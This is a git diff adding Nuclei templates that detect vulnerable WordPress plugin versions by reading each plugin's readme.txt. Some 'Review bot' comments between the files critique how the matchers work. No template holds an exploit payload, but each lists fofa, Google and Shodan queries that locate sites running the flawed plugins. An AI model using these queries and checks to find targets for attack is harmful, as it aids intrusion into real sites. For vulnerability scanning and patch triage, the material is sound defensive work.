+ shodan-query: 'vuln:CVE-2024-50507'
+ tags: cve,wordpress,wp-plugin,dsdownloadlist,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dsdownloadlist/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dsdownloadlist"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50508.yaml b/poc/cve/CVE-2024-50508.yaml
new file mode 100644
index 0000000000..d92eed92bc
--- /dev/null
+++ b/poc/cve/CVE-2024-50508.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50508-ce09f3e88a290df0e82d6f222274970f
+
+info:
+ name: >
+ Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download
+ author: topscoder
+ severity: high
+ description: >
+ The Woocommerce Product Design plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/37e84cab-746a-4b64-b9a1-7232584d1f19?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-50508
+ metadata:
+ fofa-query: "wp-content/plugins/woo-product-design/"
+ google-query: inurl:"/wp-content/plugins/woo-product-design/"
+ shodan-query: 'vuln:CVE-2024-50508'
+ tags: cve,wordpress,wp-plugin,woo-product-design,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-product-design/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-product-design"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50509.yaml b/poc/cve/CVE-2024-50509.yaml
new file mode 100644
index 0000000000..8e9fa13c20
--- /dev/null
+++ b/poc/cve/CVE-2024-50509.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50509-629fe701bf3b8fa380113ae2d245568b
+
+info:
+ name: >
+ Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Deletion
+ author: topscoder
+ severity: critical
+ description: >
+ The Woocommerce Product Design plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e987c38-b3a0-470e-9688-c8d79c853501?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-50509
+ metadata:
+ fofa-query: "wp-content/plugins/woo-product-design/"
+ google-query: inurl:"/wp-content/plugins/woo-product-design/"
+ shodan-query: 'vuln:CVE-2024-50509'
+ tags: cve,wordpress,wp-plugin,woo-product-design,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-product-design/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-product-design"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50510.yaml b/poc/cve/CVE-2024-50510.yaml
new file mode 100644
index 0000000000..56ee1bf348
--- /dev/null
+++ b/poc/cve/CVE-2024-50510.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50510-0f258545969915717983830459c9be02
+
+info:
+ name: >
+ AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload
+ author: topscoder
+ severity: critical
+ description: >
+ The AR for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48950965-f7da-42af-9f9a-4bf7fd33be45?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-50510
+ metadata:
+ fofa-query: "wp-content/plugins/ar-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/ar-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-50510'
+ tags: cve,wordpress,wp-plugin,ar-for-woocommerce,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ar-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ar-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50511.yaml b/poc/cve/CVE-2024-50511.yaml
new file mode 100644
index 0000000000..70a8428fa3
--- /dev/null
+++ b/poc/cve/CVE-2024-50511.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50511-29b214c219866f7f2500c02f16eae355
+
+info:
+ name: >
+ WP donimedia carousel <= 1.0.1 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The WP donimedia carousel plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff09292b-c8a6-4cd8-a8dd-d79b4c713d6f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-50511
+ metadata:
+ fofa-query: "wp-content/plugins/wp-donimedia-carousel/"
+ google-query: inurl:"/wp-content/plugins/wp-donimedia-carousel/"
+ shodan-query: 'vuln:CVE-2024-50511'
+ tags: cve,wordpress,wp-plugin,wp-donimedia-carousel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-donimedia-carousel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-donimedia-carousel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50512.yaml b/poc/cve/CVE-2024-50512.yaml
new file mode 100644
index 0000000000..5b2fcde724
--- /dev/null
+++ b/poc/cve/CVE-2024-50512.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50512-237b303d56b5af70349547129fcdbed3
+
+info:
+ name: >
+ Posti Shipping <= 3.10.2 - Full Path Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The Posti Shipping plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.10.2. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/023bef79-a3ab-41f7-a287-955c6331c77e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-50512
+ metadata:
+ fofa-query: "wp-content/plugins/posti-shipping/"
+ google-query: inurl:"/wp-content/plugins/posti-shipping/"
+ shodan-query: 'vuln:CVE-2024-50512'
+ tags: cve,wordpress,wp-plugin,posti-shipping,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/posti-shipping/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "posti-shipping"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.10.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50513.yaml b/poc/cve/CVE-2024-50513.yaml
new file mode 100644
index 0000000000..f0b5865fcd
--- /dev/null
+++ b/poc/cve/CVE-2024-50513.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50513-9a78c086e5a8808800a944063382e7fe
+
+info:
+ name: >
+ PostX <= 4.1.15 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/97df0ac7-3240-4d2b-aa2c-779c8e9359e8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-50513
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-post/"
+ google-query: inurl:"/wp-content/plugins/ultimate-post/"
+ shodan-query: 'vuln:CVE-2024-50513'
+ tags: cve,wordpress,wp-plugin,ultimate-post,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.15')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50514.yaml b/poc/cve/CVE-2024-50514.yaml
new file mode 100644
index 0000000000..95d27ab35a
--- /dev/null
+++ b/poc/cve/CVE-2024-50514.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50514-accc68ef1929a7b2329c8ddb3987dcea
+
+info:
+ name: >
+ Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.17 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.8.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/949ea4e6-420a-437d-8e71-ee20119343f3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-50514
+ metadata:
+ fofa-query: "wp-content/plugins/ninja-forms/"
+ google-query: inurl:"/wp-content/plugins/ninja-forms/"
+ shodan-query: 'vuln:CVE-2024-50514'
+ tags: cve,wordpress,wp-plugin,ninja-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ninja-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.8.17')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50515.yaml b/poc/cve/CVE-2024-50515.yaml
new file mode 100644
index 0000000000..23473b7bbf
--- /dev/null
+++ b/poc/cve/CVE-2024-50515.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50515-926c437f547ae6645dfe09ee30b6a14a
+
+info:
+ name: >
+ Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.17 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.8.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/00dc3911-c29e-4f4f-973c-8e4da5dd0e35?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-50515
+ metadata:
+ fofa-query: "wp-content/plugins/ninja-forms/"
+ google-query: inurl:"/wp-content/plugins/ninja-forms/"
+ shodan-query: 'vuln:CVE-2024-50515'
+ tags: cve,wordpress,wp-plugin,ninja-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ninja-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.8.17')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50516.yaml b/poc/cve/CVE-2024-50516.yaml
new file mode 100644
index 0000000000..f0179b377b
--- /dev/null
+++ b/poc/cve/CVE-2024-50516.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-50516-8a347587322ab61994f1c313f3ae4f6a + +info: + name: > + Countdown, Coming Soon, Maintenance – Countdown & Clock <= 2.8.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Countdown, Coming Soon, Maintenance – Countdown & Clock plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99a24c92-b6e5-4bbd-8cd8-1f95f47d3675?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-50516 + metadata: + fofa-query: "wp-content/plugins/countdown-builder/" + google-query: inurl:"/wp-content/plugins/countdown-builder/" + shodan-query: 'vuln:CVE-2024-50516' + tags: cve,wordpress,wp-plugin,countdown-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/countdown-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "countdown-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-50550.yaml b/poc/cve/CVE-2024-50550.yaml new file mode 100644 index 0000000000..949bbcdd99 --- /dev/null +++ b/poc/cve/CVE-2024-50550.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50550-9294cd7dd32b1b6c4c7413876be90f29 + +info: + name: > + LiteSpeed Cache <= 6.5.1 - Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The LiteSpeed Cache plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.1. This is due to the is_role_simulation() function not properly providing protection against unauthorized use of the function. This makes it possible for unauthenticated attackers to simulate roles such as administrators which provides elevated access to the site. Please note there are a lot of pre-requisites for this to be exploitable. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91365d3b-8e93-4202-8d44-9d217aaae0a4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-50550 + metadata: + fofa-query: "wp-content/plugins/litespeed-cache/" + google-query: inurl:"/wp-content/plugins/litespeed-cache/" + shodan-query: 'vuln:CVE-2024-50550' + tags: cve,wordpress,wp-plugin,litespeed-cache,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "litespeed-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.1') \ No newline at end of file 
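Review bot: The matchers report `severity: high` on a version string alone, while the description itself says there are a lot of pre-requisites for this to be exploitable. The only evidence collected is the `Stable tag` line of `readme.txt` compared with `<= 6.5.1`, so a match means an affected release appears to be installed, not that role simulation is reachable; a readme whose tag is not numeric would not match `([0-9.]+)` at all. I would state that limit in the template, for example a comment above `http:` reading `# version-only check (readme.txt Stable tag); confirm the installed version and plugin settings before triage`. The same applies to the other templates added in this commit, which share this request and matcher set.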
diff --git a/poc/cve/CVE-2024-51615.yaml b/poc/cve/CVE-2024-51615.yaml new file mode 100644 index 0000000000..e8847045ca --- /dev/null +++ b/poc/cve/CVE-2024-51615.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51615-472c74f38292481e3ef2df3b338ae9c4 + +info: + name: > + WordPress Auction Plugin <= 3.7 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The WordPress Auction Plugin plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c2e8932-f207-40f2-85c9-5d1f28f859f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-51615 + metadata: + fofa-query: "wp-content/plugins/wp-auctions/" + google-query: inurl:"/wp-content/plugins/wp-auctions/" + shodan-query: 'vuln:CVE-2024-51615' + tags: cve,wordpress,wp-plugin,wp-auctions,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-auctions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-51647.yaml b/poc/cve/CVE-2024-51647.yaml new file mode 100644 index 0000000000..852818c0cb --- /dev/null +++ b/poc/cve/CVE-2024-51647.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51647-ad264e127abeca56e70808ef8908f3d5 + +info: + name: > + Featured Posts Scroll <= 1.25 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Featured Posts Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.25. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-51647 + metadata: + fofa-query: "wp-content/plugins/featured-posts-scroll/" + google-query: inurl:"/wp-content/plugins/featured-posts-scroll/" + shodan-query: 'vuln:CVE-2024-51647' + tags: cve,wordpress,wp-plugin,featured-posts-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.25') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-51792.yaml b/poc/cve/CVE-2024-51792.yaml new file mode 100644 index 0000000000..1ef4002b76 --- /dev/null +++ b/poc/cve/CVE-2024-51792.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51792-bdfb574c36a41e7d922169660919a6d7 + +info: + name: > + Audio Record <= 1.0 - Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Audio Record plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the save_record_callback function in versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a7f869d-e915-4048-b0e1-36cf25e732f9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-51792 + metadata: + fofa-query: "wp-content/plugins/audio-record/" + google-query: inurl:"/wp-content/plugins/audio-record/" + shodan-query: 'vuln:CVE-2024-51792' + tags: cve,wordpress,wp-plugin,audio-record,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/audio-record/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "audio-record" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51815.yaml b/poc/cve/CVE-2024-51815.yaml new file mode 100644 index 0000000000..9d365f9368 --- /dev/null +++ b/poc/cve/CVE-2024-51815.yaml 
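Review bot: The `word` matcher requires the literal slug `audio-record` in the body of `readme.txt`, and word matching is case-sensitive by default, so a readme that carries only the display name would make the `and` chain fail and hide a 9.8-rated finding. The request path already pins the plugin directory and the `dsl` matcher already needs an extracted version, so the slug check adds little; matching on the readme's own marker, `- "Stable tag:"`, would be less brittle. Whether the shipped readme contains the slug cannot be confirmed from this page. The other templates in this commit use the same slug-in-body pattern.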
@@ -0,0 +1,59 @@ +id: CVE-2024-51815-2050eb9a873e413f9671599898c2d828 + +info: + name: > + s2Member (Pro) <= 241114 - Unauthenticated Remote Code Execution + author: topscoder + severity: critical + description: > + The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions (Pro) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc6de82-a4c1-4125-9be0-4fb6de42c178?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-51815 + metadata: + fofa-query: "wp-content/plugins/s2member/" + google-query: inurl:"/wp-content/plugins/s2member/" + shodan-query: 'vuln:CVE-2024-51815' + tags: cve,wordpress,wp-plugin,s2member,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/s2member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "s2member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 241114') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53278.yaml b/poc/cve/CVE-2024-53278.yaml new file mode 100644 index 0000000000..7e2cab2c84 --- /dev/null +++ b/poc/cve/CVE-2024-53278.yaml 
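Review bot: The name and description scope this finding to the Pro build, but the probe reads `/wp-content/plugins/s2member/readme.txt` and matches the slug `s2member`, which looks like the base plugin's directory. If the Pro component ships in its own directory or is versioned separately (not visible on this page), sites running only the base plugin at or below 241114 would be reported for `CVE-2024-51815`. I would either confirm that the base readme tracks the Pro release or say so in `description`, e.g. `Detection reads the base plugin readme; presence of the Pro component is not verified.`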
@@ -0,0 +1,59 @@ +id: CVE-2024-53278-e787634bec31d7c19793015e1c4a9a1d + +info: + name: > + WP Admin UI Customize <= 1.5.13 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Admin UI Customize plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4e8f03f4-f7a6-408c-a79e-f9cd03d77a76?source=api-prod + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: 